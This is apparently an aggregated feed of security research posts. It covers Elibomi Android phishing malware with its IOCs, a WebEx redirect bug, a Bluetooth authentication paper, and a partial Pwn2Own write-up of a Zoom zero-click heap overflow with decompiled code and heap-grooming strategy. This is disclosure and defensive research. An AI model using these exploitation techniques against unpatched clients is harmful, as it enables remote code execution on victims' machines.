During our investigation, we found the main distribution method of the latest campaign in one of the stolen SMS messages exposed in one of the C2 servers. The SMS body field in the screenshot below shows the Smishing attack used to deliver the malware. Interestingly, the message includes the victim’s name in order to make the message more personal and therefore more credible. It also urges the user to click on a suspicious link with the excuse of checking an urgent update regarding the victim’s Income Tax return: 

Figure 3. Exposed information includes the SMS phishing attack used to originally deliver the malware 

Elibomi not only exposes stolen SMS messages, but it also captures and exposes the list of all accounts logged in the infected devices: 

Figure 4. Example of account information exposed in one of the C2 servers

If the targeted user clicks on the link in the text message, a phishing page will be shown pretending to be from the Income Tax Department from the Indian government which addresses the user by its name to make the phishing attack more credible: 

Figure 5. Fake e-Filing phishing page pretending to be from the Income Tax Department in India 

Each targeted user has a different application. For example in the screenshot below we have the app “cisco.uemoveqlg.imobile” on the left and “komatsu.mjeqls.imobile” on the right: 

Figure 6. Different malicious applications for different users

During our investigation, we found that there are several variants of Elibomi for the same iMobile fake Income tax app. For example, some iMobile apps only have the login page while in others have the option to “register” and request a fake tax refund: 

Figure 7. Fake iMobile screens designed to capture personal and financial information 

The sensitive financial information provided by the tricked user is also exposed on the Internet: 

Figure 8. Example of exposed financial information stolen by Elibomi using a fake tax filling app 

Related Fake IT Certificate applications 

The first Elibomi campaign pretended to be a fake “IT Certificate” app was found to be distributed in November 2020.  In the following figure we can see the similarities in the code between the two malware campaigns: 

Figure 9. Code similarity between Elibomi campaigns 

The malicious application impersonated an IT certificate management module that is purposedly used to validate the device in a non-existent verification server. Just like the most recent version of Elibomi, this fake ITCertificate app requests SMS permissions but it also requests device administrator privileges, probably to make more difficult its removal. The malicious application also simulates a “Security Scan” but in reality what it is doing in the background is stealing personal information like e-mail, phone number and SMS/MMS messages stored in the infected device: 

Figure 10. Fake ITCertificate app pretending to do a security scan while it steals personal data in the background 

Just like with the most recent “iMobile” campaign, this fake “ITCertificate” also exposes the stolen data in one of the C2 servers. Here’s an example of a stolen SMS message that uses the same log fields and structure as the “iMobile” campaign: 

Figure 11. SMS message is stolen by the fake “ITCertificate” using the same log structure as “iMobile” 

Interesting string obfuscation technique 

The cybercriminals behind these two pieces of malware designed a simple but interesting string obfuscation technique. All strings are decoded by calling different classes and each class has a completely different table value

Figure 12. Calling the de-obfuscation method with different parameters 

Figure 13. String de-obfuscation method 

Figure 14. String de-obfuscation table 

The algorithm is a simple substitution cipher. For example, 35 is replaced with ‘h’ and 80 is replaced with ‘t’ to obfuscate the string. 

Appendix – Technical Data and IOCs 

Hash  Package name 
1e8fba3c530c3cd7d72e208e25fbf704ad7699c0a6728ab1b290c645995ddd56  direct.uujgiq.imobile 
7f7b0555563e08e0763fe52f1790c86033dab8004aa540903782957d0116b87f  ferrero.uabxzraglk.imobile 


120a51611a02d1d8bd404bb426e07959ef79e808f1a55ce5bff33f04de1784ac  erni.zbvbqlk.imobile 


ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 


da900a00150fcd608a09dab8a8ccdcf33e9efc089269f9e0e6b3daadb9126231  foundation.aznohomqlq.imobile 
795425dfc701463f1b55da0fa4e7c9bb714f99fecf7b7cdb6f91303e50d1efc0  fresenius.bowqpd.immobile 
b41c9f27c49386e61d87e7fc429b930f5e01038d17ff3840d7a3598292c935d7  cisco.uemoveqlg.immobile 
8de8c8c95fecd0b1d7b1f352cbaf839cba1c3b847997c804dfa2d5e3c0c87dfe  komatsu.mjeqls.imobile 
ecbd905c44b1519590df5465ea8acee9d3c155334b497fd86f6599b1c16345ef  olayan.bxynrqlq.imobile 
326d81ba7a715a57ba7aa2398824b420fff84cda85c0dd143462300af4e0a37a  alstom.zjeubopqf.certificate 
154cfd0dbb7eb2a4f4e5193849d314fa70dcc3caebfb9ab11b4ee26e98cb08f7  alstom.zjeubopqf.certificate 
c59ecd344729dac99d9402609e248c80e10d39c4d4d712edef0df9ee460fbd7b  alstom.zjeubopqf.certificate 
16284cad1b5a36e2d2ea9f67f5c772af01b64d785f181fd31d2e2bec2d98ce98  alstom.zjeubopqf.certificate 
98fc0d5f914ae47b61bc7b54986295d86b502a9264d7f74739ca452fac65a179  alstom.zjeubopqf.certificate 




The post Phishing Android Malware Targets Taxpayers in India appeared first on McAfee Blog.

Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:


While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:


From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to


The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)

Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Issues with Indefinite Trust in Bluetooth

25 August 2021 at 14:37

At IncludeSec we of course love to hack things, but we also love to use our skills and insights into security issues to explore innovative solutions, develop tools, and share resources. In this post we share a summary of a recent paper that I published with fellow researchers in the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec’21). WiSec is a conference well attended by people across industry, government, and academia; it is dedicated to all aspects of security and privacy in wireless and mobile networks and their applications, mobile software platforms, Internet of Things, cyber-physical systems, usable security and privacy, biometrics, and cryptography. 


Recurring Verification of Interaction Authenticity Within Bluetooth Networks
Travis Peters (Include Security), Timothy Pierson (Dartmouth College), Sougata Sen (BITS GPilani, KK Birla Goa Campus, India), José Camacho (University of Granada, Spain), and David Kotz (Dartmouth College)

The most common forms of authentication are passwords, potentially used in combination with a second factor such as a hardware token or mobile app (i.e., two-factor authentication). These approaches emphasize a one-time, initial authentication. After initial authentication, authenticated entities typically remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires. Unfortunately, explicit deauthentication happens rarely, if ever. To address this issue, recent work has explored how to provide passive, continuous authentication and/or automatic de-authentication by correlating user movements and inputs with actions observed in an application (e.g., a web browser). 

The issue with indefinite trust, however, goes beyond user authentication. Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership (e.g., sold or lost).

The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised. Thus, I put forth the argument with my academic research colleagues that one-time, single-factor, device-to-device authentication (i.e., an initial pairing) is not enough, and that there must exist some mechanism to frequently (re-)verify the authenticity of devices and their connections.

In our paper we propose a device-to-device recurring authentication scheme – Verification of Interaction Authenticity (VIA) – that is based on evaluating characteristics of the communications (interactions) between devices. We adapt techniques from wireless traffic analysis and intrusion detection systems to develop behavioral models that capture typical, authentic device interactions (behavior); these models enable recurring verification of device behavior.

Technical Highlights

  • Our recurring authentication scheme is based on off-the-shelf machine learning classifiers (e.g., Random Forest, k-NN) trained on characteristics extracted from Bluetooth/BLE network interactions. 
  • We extract model features from packet headers and payloads. Most of our analysis targets lower-level Bluetooth protocol layers, such as the HCI and L2CAP layers; higher-level BLE protocols, such as ATT, are also information-rich protocol layers. Hybrid models – combining information extracted from various protocol layers – are more complex, but may yield better results.
  • We construct verification models from a combination of fine-grained and coarse-grained features, including n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality (ingress vs. egress). 
Our verification scheme can be deployed anywhere that interposes on Bluetooth communications between two devices. One example we consider is a deployment within a kernel module running on a mobile platform.

Other Highlights from the Paper 

  • We collected and presented a new, first-of-its-kind Bluetooth dataset. This dataset captures Bluetooth network traces corresponding to app-device interactions between more than 20 smart-health and smart-home devices. The dataset is open-source and available within the VM linked below.
  • We enhanced open-source Bluetooth analysis software – bluepy and btsnoop – in an effort to improve the available tools for practical exploration of the Bluetooth protocol and Bluetooth-based apps.
  • We presented a novel modeling technique, combined with off-the-shelf machine learning classifiers, for characterizing and verifying authentic Bluetooth/BLE app-device interactions.
  • We implemented our verification scheme and evaluated our approach against a test corpus of 20 smart-home and smart-health devices. Our results show that VIA can be used for verification with an F1-score of 0.86 or better in most test cases.

To learn more, check out our paper as well as a VM pre-loaded with our code and dataset

Final Notes

Reproducible Research

We are advocates for research that is impactful and reproducible. At WiSec’21 our published work was featured as one of four papers this year that obtained the official replicability badges. These badges signify that our artifacts are available, have been evaluated for accuracy, and that our results were independently reproducible. We thank the ACM the WiSec organizers for working to make sharing and reproducibility common practice in the publication process. 

Next Steps

In future work we are interested in exploring a few directions:

  • Continue to enhance tooling that supports Bluetooth protocol analysis for research and security assessments
  • Expand our dataset to include more devices, adversarial examples, etc. 
  • Evaluate a real-world deployment (e.g., a smartphone-based multifactor authentication system for Bluetooth); such a deployment would enable us to evaluate practical issues such as verification latency, power consumption, and usability. 

Give us a shout if you are interested in our team doing bluetooth hacks for your products!

The post Issues with Indefinite Trust in Bluetooth appeared first on Include Security Research Blog.

Homemade Fuzzing Platform Recipe

By: voidsec
25 August 2021 at 13:11

It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing […]

The post Homemade Fuzzing Platform Recipe appeared first on VoidSec.

Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.


Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <active xmlns=""/>
      <send>[email protected]</send>
      <ssid>[email protected]</ssid>
    <action type="SendMessage">
    <app v="0"/>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
  1. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <active xmlns=""/>
    <from n="Jane Doe" res="ZoomChat_pc"/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="RequestKey">
    <v2data action="None"/>
    <app v="0"/>
  <zmtask feature="50"/>
  1. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <active xmlns=""/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
    <app v="0"/>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    if (iVar5 < 2) {
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");

      return 1;

    return 1;

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;

  local_20 = iVar2;
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
      goto LAB_101ba758;

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      return 0;

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  return 0xc;

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

